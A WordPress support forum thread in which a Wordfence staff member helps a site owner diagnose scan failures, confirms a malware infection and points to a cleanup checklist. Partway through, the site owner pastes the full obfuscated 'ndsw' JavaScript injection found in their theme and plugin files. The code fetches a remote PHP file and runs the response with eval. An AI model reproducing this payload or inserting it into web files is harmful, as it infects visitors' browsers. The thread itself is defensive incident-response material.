crapload of critical errors all the sudden

Hi @keithsmohr, sorry to see you’ve had critical errors crop up in your scan.

For me to better identify the possible problem, feel free to copy/paste one of the scan results here to see what the reasoning for the file(s) being flagged are along with a diagnostics report which should include the full scan results for me to potentially look into a little further.

You can send a diagnostic report to wftest @ wordfence . com The link to do so is at the top of the Wordfence > Tools > Diagnostics page. Then click on “Send Report by Email”. Please add your forum username where indicated and respond here after you have sent it.

NOTE: It should look as follows – Screenshot of Tools > Diagnostic > Send by Email

Thanks,

Peter.

Thank you for your reply. I cant even make it through a scan.
I sent the reports to your email, but did not see where I was able to add my username in with the report. My website is https://www.asafeplaceonline.com

I see this when my scan stope:

[APR 04 16:17:01] Fatal error: Maximum execution time of 30 seconds exceeded in /home/asafeplaceonline/public_html/wp-includes/Requests/Transport/cURL.php on line 462 There has been a critical error on this website.Learn more about troubleshooting WordPress.

Thank you for your help!

• This reply was modified 2 years, 11 months ago by keithsmohr.

Hi @keithsmohr,

I received a test email from your site but it did not contain a diagnostics report. On Wordfence > Tools > Diagnostics there is a second box underneath email address for “Ticket Number/Forum Username” so please ensure you’re sending from the correct place.

You could also try the following so we have as much information available to help you as possible:

• Stop the existing scan if it is still running (The “Start New Scan” button turns in to a “Stop” button while the scan is running).
• Go to your Wordfence > Scan > Manage Scan and locate the “Performance Options” section. Set “Maximum execution time for each scan stage” to 20.
• Click to “Save Changes”.
• Go to the Tools > Diagnostics page.
• In the “Debugging Options” section check the circle “Enable debugging mode”.
• Click to “Save Changes”.
• Start a new scan on the Scan page.
• If the scan fails again, copy the last 20 lines or so from the Log (click the “Show Log” link) once the scan finishes and paste them in the post.

Thanks again,

Peter.

I was able to run a scan and followed the directions to send you the report.
Thank you!

Hi @keithsmohr, thanks for sending that over.

I’m pleased you were able to run your scan and in terms of communication and permissions, your site appears to be functioning as expected. I do have reason to believe that the scan issues are not false-positives and a site clean may be necessary. We have seen the (ndsw===undefined){ pattern that is being picked up associated with malware.

If you would like a definitive answer on this, you could send one of the affected files to samples @ wordfence . com for us to analyze. Please note that when attaching a file, ensure that you remove any database access credentials or keys/salts before sending.

Follow the checklist here:
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

Make sure and get all your plugins and themes updated and update WordPress core too. If you are on an older branch (WordPress 4.x etc) because you wanted to wait before installing the latest version because of Gutenberg or a custom theme compatibility you still need the latest update in that version. Those can be found here:
https://www.ads-software.com/download/releases/
WordPress sometimes patches their older releases if they find a vulnerability so make sure to update your version if needed. We, of course, recommend that you update to the latest version.

As a rule, any time I think someone’s site has been compromised I also tell them to update their passwords for their hosting control panel, FTP, WordPress admin users, and database. Make sure to do this.

Additionally you might find the WordPress Malware Removal section in our free Learning Center helpful.

If you are unable to clean this on your own there are paid services that will do it for you. Wordfence offers one and there are others. Regardless if you choose to clean it yourself or let someone else do so, we recommend that you make a full backup of the site beforehand.

Thanks,

Peter.

thank you. I have emailed a few files that were flagged.
Let me know what you found and think I should do.
Thank you

I am not able to send the files to you, Gmail is blocking it. It does appear I have malicious code in many of my js files.

I found this info online.

https://stackoverflow.com/questions/66303231/wordpress-all-theme-plugin-js-file-is-adding-this-script-how-can-i-remove-that

this is the malicious code:

)();
;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//asafeplaceonline.com/wp-admin/css/colors/blue/blue.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

I fixed all the files, thanks to Word Fence! My site is back to safe and secure! Thanks for the help!

Thanks @keithsmohr, I appreciate the kind words and I’m extremely pleased you were able to resolve the issue with the help of Wordfence.

By all means start a new topic if you have Wordfence questions in future and we’ll always be happy to assist!

Peter.

hi for every one
I have a number of sites where all the JavaScript files have the malicious code mentioned on this page.
I want to know how this malware has infiltrated my sites.
And what this malware does to the site because there is no change in the appearance of the website